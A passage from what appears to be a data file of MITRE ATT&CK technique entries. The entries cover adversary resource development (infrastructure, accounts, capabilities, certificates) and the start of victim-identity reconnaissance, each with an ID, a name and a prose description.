                              'Control, can allow adversaries to benefit from the ubiquity and trust associated with '
                              'higher reputation cloud service providers. Adversaries may also acquire infrastructure '
                              'from VPS service providers that are known for renting VPSs with minimal registration '
                              'information, allowing for more anonymous acquisitions of infrastructure.(Citation: '
                              'TrendmicroHideoutsLease)',
               'name': 'Virtual Private Server',
               'platforms': ['PRE']},
 'T1583.004': {'attack_id': 'T1583.004',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy, lease, or rent physical servers\xa0'
                              'that can be used during targeting. Use of servers allows an adversary to stage, launch, '
                              'and execute an operation. During post-compromise activity, adversaries may utilize '
                              'servers for various tasks, including for Command and Control. Instead of compromising a '
                              'third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a '
                              '[Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries '
                              'may opt to configure and run their own servers in support of operations.\n'
                              '\n'
                              'Adversaries may only need a lightweight setup if most of their activities will take '
                              'place using online infrastructure. Or, they may need to build extensive infrastructure '
                              'if they want to test, communicate, and control other aspects of their activities on '
                              'their own systems.(Citation: NYTStuxnet)',
               'name': 'Server',
               'platforms': ['PRE']},
 'T1583.005': {'attack_id': 'T1583.005',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy, lease, or rent a network of '
                              'compromised systems\xa0that can be used during targeting. A botnet is a network of '
                              'compromised systems that can be instructed to perform coordinated tasks.(Citation: '
                              'Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a '
                              'booter/stresser service. With a botnet at their disposal, adversaries may perform '
                              'follow-on activity such as large-scale '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service '
                              '(DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: '
                              'Krebs-Bazaar)(Citation: Krebs-Booter)',
               'name': 'Botnet',
               'platforms': ['PRE']},
 'T1583.006': {'attack_id': 'T1583.006',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may register for web services\xa0that can be '
                              'used during targeting. A variety of popular websites exist for adversaries to register '
                              'for a web-based service that can be abused during later stages of the adversary '
                              'lifecycle, such as during Command and Control ([Web '
                              'Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web '
                              'Service](https://attack.mitre.org/techniques/T1567). Using common services, such as '
                              'those offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. By utilizing a web service, adversaries can make it difficult to physically tie '
                              'back operations to them.',
               'name': 'Web Services',
               'platforms': ['PRE']},
 'T1584': {'attack_id': 'T1584',
           'categories': ['resource-development'],
           'description': 'Before compromising a victim, adversaries may compromise third-party infrastructure that '
                          'can be used during targeting. Infrastructure solutions include physical or cloud servers, '
                          'domains, and third-party web services. Instead of buying, leasing, or renting '
                          'infrastructure an adversary may compromise infrastructure and use it during other phases of '
                          'the adversary lifecycle.(Citation: Mandiant APT1)(Citation: '
                          'ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS '
                          'Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet '
                          'they can leverage.\n'
                          '\n'
                          'Use of compromised infrastructure allows an adversary to stage, launch, and execute an '
                          'operation. Compromised infrastructure can help adversary operations blend in with traffic '
                          'that is seen as normal, such as contact with high reputation or trusted sites. By using '
                          'compromised infrastructure, adversaries may make it difficult to tie their actions back to '
                          'them. Prior to targeting, adversaries may compromise the infrastructure of other '
                          'adversaries.(Citation: NSA NCSC Turla OilRig)',
           'name': 'Compromise Infrastructure',
           'platforms': ['PRE']},
 'T1584.001': {'attack_id': 'T1584.001',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may hijack domains and/or subdomains that can '
                              'be used during targeting. Domain registration hijacking is the act of changing the '
                              'registration of a domain name without the permission of the original '
                              'registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an '
                              'email account for the person listed as the owner of the domain. The adversary can then '
                              'claim that they forgot their password in order to make changes to the domain '
                              'registration. Other possibilities include social engineering a domain registration help '
                              'desk to gain access to an account or taking advantage of renewal process gaps.\n'
                              '\n'
                              'Subdomain hijacking can occur when organizations have DNS entries that point to '
                              'non-existent or deprovisioned resources. In such cases, an adversary may take control '
                              'of a subdomain to conduct operations with the benefit of the trust associated with that '
                              'domain.(Citation: Microsoft Sub Takeover 2020)',
               'name': 'Domains',
               'platforms': ['PRE']},
 'T1584.002': {'attack_id': 'T1584.002',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise third-party DNS servers that '
                              'can be used during targeting. During post-compromise activity, adversaries may utilize '
                              'DNS traffic for various tasks, including for Command and Control (ex: [Application '
                              'Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up '
                              'their own DNS servers, adversaries may compromise third-party DNS servers in support of '
                              'operations.\n'
                              '\n'
                              'By compromising DNS servers, adversaries can alter DNS records. Such control can allow '
                              "for redirection of an organization's traffic, facilitating Collection and Credential "
                              'Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: '
                              'FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains '
                              'pointed at malicious servers without tipping off the actual owner of the DNS '
                              'server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)',
               'name': 'DNS Server',
               'platforms': ['PRE']},
 'T1584.003': {'attack_id': 'T1584.003',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise third-party Virtual Private '
                              'Servers (VPSs) that can be used during targeting. There exist a variety of cloud '
                              'service providers that will sell virtual machines/containers as a service. Adversaries '
                              'may compromise VPSs purchased by third-party entities. By compromising a VPS to use as '
                              'infrastructure, adversaries can make it difficult to physically tie back operations to '
                              'themselves.(Citation: NSA NCSC Turla OilRig)\n'
                              '\n'
                              'Compromising a VPS for use in later stages of the adversary lifecycle, such as Command '
                              'and Control, can allow adversaries to benefit from the ubiquity and trust associated '
                              'with higher reputation cloud service providers as well as that added by the compromised '
                              'third-party.',
               'name': 'Virtual Private Server',
               'platforms': ['PRE']},
 'T1584.004': {'attack_id': 'T1584.004',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise third-party servers that can '
                              'be used during targeting. Use of servers allows an adversary to stage, launch, and '
                              'execute an operation. During post-compromise activity, adversaries may utilize servers '
                              'for various tasks, including for Command and Control. Instead of purchasing a '
                              '[Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private '
                              'Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise '
                              'third-party servers in support of operations.\n'
                              '\n'
                              'Adversaries may also compromise web servers to support watering hole operations, as in '
                              '[Drive-by Compromise](https://attack.mitre.org/techniques/T1189).',
               'name': 'Server',
               'platforms': ['PRE']},
 'T1584.005': {'attack_id': 'T1584.005',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise numerous third-party systems '
                              'to form a botnet\xa0that can be used during targeting. A botnet is a network of '
                              'compromised systems that can be instructed to perform coordinated tasks.(Citation: '
                              'Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser '
                              'service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by '
                              'compromising numerous third-party systems. Adversaries may also conduct a takeover of '
                              'an existing botnet, such as redirecting bots to adversary-controlled C2 '
                              'servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries '
                              'may perform follow-on activity such as large-scale '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service '
                              '(DDoS).',
               'name': 'Botnet',
               'platforms': ['PRE']},
 'T1584.006': {'attack_id': 'T1584.006',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise access to third-party web '
                              'services\xa0that can be used during targeting. A variety of popular websites exist for '
                              'legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, '
                              "Google, etc. Adversaries may try to take ownership of a legitimate user's access to a "
                              'web service and use that web service as infrastructure in support of cyber operations. '
                              'Such web services can be abused during later stages of the adversary lifecycle, such as '
                              'during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) '
                              'or [Exfiltration Over Web '
                              'Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla '
                              'Infra 2020) Using common services, such as those offered by Google or Twitter, makes it '
                              'easier for adversaries to hide in expected noise. By utilizing a web service, '
                              'particularly when access is stolen from legitimate users, adversaries can make it '
                              'difficult to physically tie back operations to them.',
               'name': 'Web Services',
               'platforms': ['PRE']},
 'T1585': {'attack_id': 'T1585',
           'categories': ['resource-development'],
           'description': 'Before compromising a victim, adversaries may create and cultivate accounts with services '
                          'that can be used during targeting. Adversaries can create accounts that can be used to '
                          'build a persona to further operations. Persona development consists of the development of '
                          'public information, presence, history and appropriate affiliations. This development could '
                          'be applied to social media, website, or other publicly available information that could be '
                          'referenced and scrutinized for legitimacy over the course of an operation using that '
                          'persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n'
                          '\n'
                          'For operations incorporating social engineering, the utilization of an online persona may '
                          'be important. These personas may be fictitious or impersonate real people. The persona may '
                          'exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, '
                          'etc.). Establishing a persona may require development of additional documentation to make '
                          'them seem real. This could include filling out profile information, developing social '
                          'networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n'
                          '\n'
                          'Establishing accounts can also include the creation of accounts with email providers, which '
                          'may be directly leveraged for [Phishing for '
                          'Information](https://attack.mitre.org/techniques/T1598) or '
                          '[Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)',
           'name': 'Establish Accounts',
           'platforms': ['PRE']},
 'T1585.001': {'attack_id': 'T1585.001',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may create and cultivate social media '
                              'accounts that can be used during targeting. Adversaries can create social media '
                              'accounts that can be used to build a persona to further operations. Persona development '
                              'consists of the development of public information, presence, history and appropriate '
                              'affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n'
                              '\n'
                              'For operations incorporating social engineering, the utilization of a persona on social '
                              'media may be important. These personas may be fictitious or impersonate real people. '
                              'The persona may exist on a single social media site or across multiple sites (ex: '
                              'Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require '
                              'development of additional documentation to make them seem real. This could include '
                              'filling out profile information, developing social networks, or incorporating photos. \n'
                              '\n'
                              'Once a persona has been developed an adversary can use it to create connections to '
                              'targets of interest. These connections may be direct or may include trying to connect '
                              'through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts '
                              'may be leveraged during other phases of the adversary lifecycle, such as during Initial '
                              'Access (ex: [Spearphishing via '
                              'Service](https://attack.mitre.org/techniques/T1566/003)).',
               'name': 'Social Media Accounts',
               'platforms': ['PRE']},
 'T1585.002': {'attack_id': 'T1585.002',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may create email accounts that can be used '
                              'during targeting. Adversaries can use accounts created with email providers to further '
                              'their operations, such as leveraging them to conduct [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598) or '
                              '[Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) '
                              'Adversaries may also take steps to cultivate a persona around the email account, such '
                              'as through use of [Social Media '
                              'Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of '
                              'success of follow-on behaviors. Created email accounts can also be used in the '
                              'acquisition of infrastructure (ex: '
                              '[Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n'
                              '\n'
                              'To decrease the chance of physically tying back operations to themselves, adversaries '
                              'may make use of disposable email services.(Citation: Trend Micro R980 2016)',
               'name': 'Email Accounts',
               'platforms': ['PRE']},
 'T1586': {'attack_id': 'T1586',
           'categories': ['resource-development'],
           'description': 'Before compromising a victim, adversaries may compromise accounts with services that can be '
                          'used during targeting. For operations incorporating social engineering, the utilization of '
                          'an online persona may be important. Rather than creating and cultivating accounts (i.e. '
                          '[Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may '
                          'compromise existing accounts. Utilizing an existing persona may engender a level of trust '
                          'in a potential victim if they have a relationship, or knowledge of, the compromised '
                          'persona. \n'
                          '\n'
                          'A variety of methods exist for compromising accounts, such as gathering credentials via '
                          '[Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing '
                          'credentials from third-party sites, or by brute forcing credentials (ex: password reuse '
                          'from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, '
                          'adversaries may conduct Reconnaissance to inform decisions about which accounts to '
                          'compromise to further their operation.\n'
                          '\n'
                          'Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, '
                          'Twitter, Google, etc.). Compromised accounts may require additional development, this could '
                          'include filling out or modifying profile information, further developing social networks, '
                          'or incorporating photos.\n'
                          '\n'
                          'Adversaries may directly leverage compromised email accounts for [Phishing for '
                          'Information](https://attack.mitre.org/techniques/T1598) or '
                          '[Phishing](https://attack.mitre.org/techniques/T1566).',
           'name': 'Compromise Accounts',
           'platforms': ['PRE']},
 'T1586.001': {'attack_id': 'T1586.001',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise social media accounts that can '
                              'be used during targeting. For operations incorporating social engineering, the '
                              'utilization of an online persona may be important. Rather than creating and cultivating '
                              'social media profiles (i.e. [Social Media '
                              'Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise '
                              'existing social media accounts. Utilizing an existing persona may engender a level of '
                              'trust in a potential victim if they have a relationship, or knowledge of, the '
                              'compromised persona. \n'
                              '\n'
                              'A variety of methods exist for compromising social media accounts, such as gathering '
                              'credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), '
                              'purchasing credentials from third-party sites, or by brute forcing credentials (ex: '
                              'password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to '
                              'compromising social media accounts, adversaries may conduct Reconnaissance to inform '
                              'decisions about which accounts to compromise to further their operation.\n'
                              '\n'
                              'Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, '
                              'Twitter, etc.). Compromised social media accounts may require additional development, '
                              'this could include filling out or modifying profile information, further developing '
                              'social networks, or incorporating photos.\n'
                              '\n'
                              'Adversaries can use a compromised social media profile to create new, or hijack '
                              'existing, connections to targets of interest. These connections may be direct or may '
                              'include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: '
                              'BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the '
                              'adversary lifecycle, such as during Initial Access (ex: [Spearphishing via '
                              'Service](https://attack.mitre.org/techniques/T1566/003)).',
               'name': 'Social Media Accounts',
               'platforms': ['PRE']},
 'T1586.002': {'attack_id': 'T1586.002',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may compromise email accounts that can be '
                              'used during targeting. Adversaries can use compromised email accounts to further their '
                              'operations, such as leveraging them to conduct [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598) or '
                              '[Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona '
                              'with a compromised email account may engender a level of trust in a potential victim if '
                              'they have a relationship, or knowledge of, the compromised persona. Compromised email '
                              'accounts can also be used in the acquisition of infrastructure (ex: '
                              '[Domains](https://attack.mitre.org/techniques/T1583/001)).\n'
                              '\n'
                              'A variety of methods exist for compromising email accounts, such as gathering '
                              'credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), '
                              'purchasing credentials from third-party sites, or by brute forcing credentials (ex: '
                              'password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to '
                              'compromising email accounts, adversaries may conduct Reconnaissance to inform decisions '
                              'about which accounts to compromise to further their operation.\n'
                              '\n'
                              'Adversaries can use a compromised email account to hijack existing email threads with '
                              'targets of interest.',
               'name': 'Email Accounts',
               'platforms': ['PRE']},
 'T1587': {'attack_id': 'T1587',
           'categories': ['resource-development'],
           'description': 'Before compromising a victim, adversaries may build capabilities that can be used during '
                          'targeting. Rather than purchasing, freely downloading, or stealing capabilities, '
                          'adversaries may develop their own capabilities in-house. This is the process of identifying '
                          'development requirements and building solutions such as malware, exploits, and self-signed '
                          'certificates. Adversaries may develop capabilities to support their operations throughout '
                          'numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky '
                          'Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n'
                          '\n'
                          'As with legitimate development efforts, different skill sets may be required for developing '
                          'capabilities. The skills needed may be located in-house, or may need to be contracted out. '
                          "Use of a contractor may be considered an extension of that adversary's development "
                          'capabilities, provided the adversary plays a role in shaping requirements and maintains a '
                          'degree of exclusivity to the capability.',
           'name': 'Develop Capabilities',
           'platforms': ['PRE']},
 'T1587.001': {'attack_id': 'T1587.001',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may develop malware and malware components '
                              'that can be used during targeting. Building malicious software can include the '
                              'development of payloads, droppers, post-compromise tools, backdoors, packers, C2 '
                              'protocols, and the creation of infected removable media. Adversaries may develop '
                              'malware to support their operations, creating a means for maintaining control of remote '
                              'machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant '
                              'APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash '
                              'FIN7 USB)\n'
                              '\n'
                              'As with legitimate development efforts, different skill sets may be required for '
                              'developing malware. The skills needed may be located in-house, or may need to be '
                              "contracted out. Use of a contractor may be considered an extension of that adversary's "
                              'malware development capabilities, provided the adversary plays a role in shaping '
                              'requirements and maintains a degree of exclusivity to the malware.\n'
                              '\n'
                              'Some aspects of malware development, such as C2 protocol development, may require '
                              'adversaries to obtain additional infrastructure. For example, malware developed that '
                              'will communicate with Twitter for C2, may require use of [Web '
                              'Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)',
               'name': 'Malware',
               'platforms': ['PRE']},
 'T1587.002': {'attack_id': 'T1587.002',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may create self-signed code signing '
                              'certificates that can be used during targeting. Code signing is the process of '
                              'digitally signing executables and scripts to confirm the software author and guarantee '
                              'that the code has not been altered or corrupted. Code signing provides a level of '
                              'authenticity for a program from the developer and a guarantee that the program has not '
                              'been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may '
                              "trust a signed piece of code more than an unsigned piece of code even if they don't "
                              'know who issued the certificate or who the author is.\n'
                              '\n'
                              'Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may '
                              'develop self-signed code signing certificates for use in operations.',
               'name': 'Code Signing Certificates',
               'platforms': ['PRE']},
 'T1587.003': {'attack_id': 'T1587.003',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may create self-signed SSL/TLS certificates '
                              'that can be used during targeting. SSL/TLS certificates are designed to instill trust. '
                              "They include information about the key, information about its owner's identity, and the "
                              "digital signature of an entity that has verified the certificate's contents are "
                              'correct. If the signature is valid, and the person examining the certificate trusts the '
                              'signer, then they know they can use that key to communicate with its owner. In the case '
                              'of self-signing, digital certificates will lack the element of trust associated with '
                              'the signature of a third-party certificate authority (CA).\n'
                              '\n'
                              'Adversaries may create self-signed SSL/TLS certificates that can be used to further '
                              'their operations, such as encrypting C2 traffic (ex: [Web '
                              'Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling '
                              '[Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of '
                              'trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).',
               'name': 'Digital Certificates',
               'platforms': ['PRE']},
 'T1587.004': {'attack_id': 'T1587.004',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may develop exploits that can be used during '
                              'targeting. An exploit takes advantage of a bug or vulnerability in order to cause '
                              'unintended or unanticipated behavior to occur on computer hardware or software. Rather '
                              'than finding/modifying exploits from online or purchasing them from exploit vendors, an '
                              'adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use '
                              'information acquired via '
                              '[Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit '
                              'development efforts. As part of the exploit development process, adversaries may '
                              'uncover exploitable vulnerabilities through methods such as fuzzing and patch '
                              'analysis.(Citation: Irongeek Sims BSides 2017)\n'
                              '\n'
                              'As with legitimate development efforts, different skill sets may be required for '
                              'developing exploits. The skills needed may be located in-house, or may need to be '
                              "contracted out. Use of a contractor may be considered an extension of that adversary's "
                              'exploit development capabilities, provided the adversary plays a role in shaping '
                              'requirements and maintains an initial degree of exclusivity to the exploit.\n'
                              '\n'
                              'Adversaries may use exploits during various phases of the adversary lifecycle (i.e. '
                              '[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), '
                              '[Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), '
                              '[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), '
                              '[Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), '
                              '[Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), '
                              '[Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and '
                              '[Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).',
               'name': 'Exploits',
               'platforms': ['PRE']},
 'T1588': {'attack_id': 'T1588',
           'categories': ['resource-development'],
           'description': 'Before compromising a victim, adversaries may buy and/or steal capabilities that can be '
                          'used during targeting. Rather than developing their own capabilities in-house, adversaries '
                          'may purchase, freely download, or steal them. Activities may include the acquisition of '
                          'malware, software (including licenses), exploits, certificates, and information relating to '
                          'vulnerabilities. Adversaries may obtain capabilities to support their operations throughout '
                          'numerous phases of the adversary lifecycle.\n'
                          '\n'
                          'In addition to downloading free malware, software, and exploits from the internet, '
                          'adversaries may purchase these capabilities from third-party entities. Third-party entities '
                          'can include technology companies that specialize in malware and exploits, criminal '
                          'marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n'
                          '\n'
                          'In addition to purchasing capabilities, adversaries may steal capabilities from third-party '
                          'entities (including other adversaries). This can include stealing software licenses, '
                          'malware, SSL/TLS and code-signing certificates, or raiding closed databases of '
                          'vulnerabilities or exploits.(Citation: DiginotarCompromise)',
           'name': 'Obtain Capabilities',
           'platforms': ['PRE']},
 'T1588.001': {'attack_id': 'T1588.001',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy, steal, or download malware that can '
                              'be used during targeting. Malicious software can include payloads, droppers, '
                              'post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire '
                              'malware to support their operations, obtaining a means for maintaining control of '
                              'remote machines, evading defenses, and executing post-compromise behaviors.\n'
                              '\n'
                              'In addition to downloading free malware from the internet, adversaries may purchase '
                              'these capabilities from third-party entities. Third-party entities can include '
                              'technology companies that specialize in malware development, criminal marketplaces '
                              '(including Malware-as-a-Service, or MaaS), or from individuals. In addition to '
                              'purchasing malware, adversaries may steal and repurpose malware from third-party '
                              'entities (including other adversaries).',
               'name': 'Malware',
               'platforms': ['PRE']},
 'T1588.002': {'attack_id': 'T1588.002',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy, steal, or download software tools '
                              'that can be used during targeting. Tools can be open or closed source, free or '
                              'commercial. A tool can be used for malicious purposes by an adversary, but (unlike '
                              'malware) were not intended to be used for those purposes (ex: '
                              '[PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the '
                              'procurement of commercial software licenses, including for red teaming tools such as '
                              '[Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be '
                              'obtained through purchase, stealing licenses (or licensed copies of the software), or '
                              'cracking trial versions.(Citation: Recorded Future Beacon 2019)\n'
                              '\n'
                              'Adversaries may obtain tools to support their operations, including to support '
                              'execution of post-compromise behaviors. In addition to freely downloading or purchasing '
                              'software, adversaries may steal software and/or software licenses from third-party '
                              'entities (including other adversaries).',
               'name': 'Tool',
               'platforms': ['PRE']},
 'T1588.003': {'attack_id': 'T1588.003',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy and/or steal code signing '
                              'certificates that can be used during targeting. Code signing is the process of '
                              'digitally signing executables and scripts to confirm the software author and guarantee '
                              'that the code has not been altered or corrupted. Code signing provides a level of '
                              'authenticity for a program from the developer and a guarantee that the program has not '
                              'been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may '
                              "trust a signed piece of code more than an unsigned piece of code even if they don't "
                              'know who issued the certificate or who the author is.\n'
                              '\n'
                              'Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may '
                              'purchase or steal code signing certificates for use in operations. The purchase of code '
                              'signing certificates may be done using a front organization or using information stolen '
                              'from a previously compromised entity that allows the adversary to validate to a '
                              'certificate provider as that entity. Adversaries may also steal code signing materials '
                              'directly from a compromised third-party.',
               'name': 'Code Signing Certificates',
               'platforms': ['PRE']},
 'T1588.004': {'attack_id': 'T1588.004',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates '
                              'that can be used during targeting. SSL/TLS certificates are designed to instill trust. '
                              "They include information about the key, information about its owner's identity, and the "
                              "digital signature of an entity that has verified the certificate's contents are "
                              'correct. If the signature is valid, and the person examining the certificate trusts the '
                              'signer, then they know they can use that key to communicate with its owner.\n'
                              '\n'
                              'Adversaries may purchase or steal SSL/TLS certificates to further their operations, '
                              'such as encrypting C2 traffic (ex: [Web '
                              'Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling '
                              '[Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is '
                              'trusted or otherwise added to the root of trust (i.e. [Install Root '
                              'Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital '
                              'certificates may be done using a front organization or using information stolen from a '
                              'previously compromised entity that allows the adversary to validate to a certificate '
                              'provider as that entity. Adversaries may also steal certificate materials directly from '
                              'a compromised third-party, including from certificate authorities.(Citation: '
                              'DiginotarCompromise)\n'
                              '\n'
                              'Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, '
                              "such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n"
                              '\n'
                              'Adversaries may register or hijack domains that they will later purchase an SSL/TLS '
                              'certificate for.',
               'name': 'Digital Certificates',
               'platforms': ['PRE']},
 'T1588.005': {'attack_id': 'T1588.005',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may buy, steal, or download exploits that can '
                              'be used during targeting. An exploit takes advantage of a bug or vulnerability in order '
                              'to cause unintended or unanticipated behavior to occur on computer hardware or '
                              'software. Rather than developing their own exploits, an adversary may find/modify '
                              'exploits from online or purchase them from exploit vendors.(Citation: Exploit '
                              'Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n'
                              '\n'
                              'In addition to downloading free exploits from the internet, adversaries may purchase '
                              'exploits from third-party entities. Third-party entities can include technology '
                              'companies that specialize in exploit development, criminal marketplaces (including '
                              'exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired '
                              'SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and '
                              'repurpose exploits from third-party entities (including other adversaries).(Citation: '
                              'TempertonDarkHotel)\n'
                              '\n'
                              'An adversary may monitor exploit provider forums to understand the state of existing, '
                              'as well as newly discovered, exploits. There is usually a delay between when an exploit '
                              'is discovered and when it is made public. An adversary may target the systems of those '
                              'known to conduct exploit research and development in order to gain that knowledge for '
                              'use during a subsequent operation.\n'
                              '\n'
                              'Adversaries may use exploits during various phases of the adversary lifecycle (i.e. '
                              '[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), '
                              '[Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), '
                              '[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), '
                              '[Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), '
                              '[Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), '
                              '[Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and '
                              '[Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).',
               'name': 'Exploits',
               'platforms': ['PRE']},
 'T1588.006': {'attack_id': 'T1588.006',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may acquire information about vulnerabilities '
                              'that can be used during targeting. A vulnerability is a weakness in computer hardware '
                              'or software that can, potentially, be exploited by an adversary to cause unintended or '
                              'unanticipated behavior to occur. Adversaries may find vulnerability information by '
                              'searching open databases or gaining access to closed vulnerability databases.(Citation: '
                              'National Vulnerability Database)\n'
                              '\n'
                              'An adversary may monitor vulnerability disclosures/databases to understand the state of '
                              'existing, as well as newly discovered, vulnerabilities. There is usually a delay '
                              'between when a vulnerability is discovered and when it is made public. An adversary may '
                              'target the systems of those known to conduct vulnerability research (including '
                              'commercial vendors). Knowledge of a vulnerability may cause an adversary to search for '
                              'an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or '
                              'to attempt to develop one themselves (i.e. '
                              '[Exploits](https://attack.mitre.org/techniques/T1587/004)).',
               'name': 'Vulnerabilities',
               'platforms': ['PRE']},
 'T1589': {'attack_id': 'T1589',
           'categories': ['reconnaissance'],
           'description': "Before compromising a victim, adversaries may gather information about the victim's "
                          'identity that can be used during targeting. Information about identities may include a '
                          'variety of details, including personal data (ex: employee names, email addresses, etc.) as '
                          'well as sensitive details such as credentials.\n'
                          '\n'
                          'Adversaries may gather this information in various ways, such as direct elicitation via '
                          '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about '
                          'victims may also be exposed to adversaries via online or other accessible data sets (ex: '
                          '[Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned '
                          'Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: '
                          'Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: '
